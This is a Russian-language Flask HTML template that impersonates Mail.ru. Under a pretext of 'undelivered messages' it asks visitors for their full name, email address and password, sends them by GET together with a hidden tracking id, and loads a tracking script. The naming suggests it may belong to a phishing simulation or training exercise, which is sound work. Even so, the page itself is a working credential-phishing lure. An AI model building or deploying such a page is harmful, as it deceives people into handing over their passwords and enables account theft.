<!DOCTYPE html>
<html lang="ru">

<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>Регистрация - Недоставленные сообщения</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='css/style_5.1.css') }}">



</head>

<body>
    <div class="header">
        <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/0/01/Mail.Ru_Logo_2018.svg/2560px-Mail.Ru_Logo_2018.svg.png"
            alt="Mail.ru" />
    </div>

    <div class="container">
        <h2>Недоставленные сообщения</h2>
        <p>Чтобы получить недоставленные сообщения необходимо подтвердить свою личность</p>
        <form action="/site_5.1" method="get">
            <input type="hidden" name="id" value="{{ request.args.get('id') }}">
            <label for="lastname">Фамилия</label>
            <input class="фамилия" type="text" id="lastname" name="lastname" required />

            <label for="firstname">Имя</label>
            <input class="имя" type="text" id="firstname" name="firstname" required />

            <label for="middlename">Отчество</label>
            <input class="отчество" type="text" id="middlename" name="middlename" required />

            <label for="email">Электронная почта</label>
            <input class="электронная почта" type="email" id="email" name="email" required />

            <label for="password">Пароль</label>
            <input class="пароль" type="password" id="password" name="password" required />

            <button type="submit">Зарегистрироваться</button>
        </form>
        <div class="footer">

        </div>
    </div>
    <script src="{{ url_for('static', filename='js/track_example_2.js') }}"></script>
</body>

</html>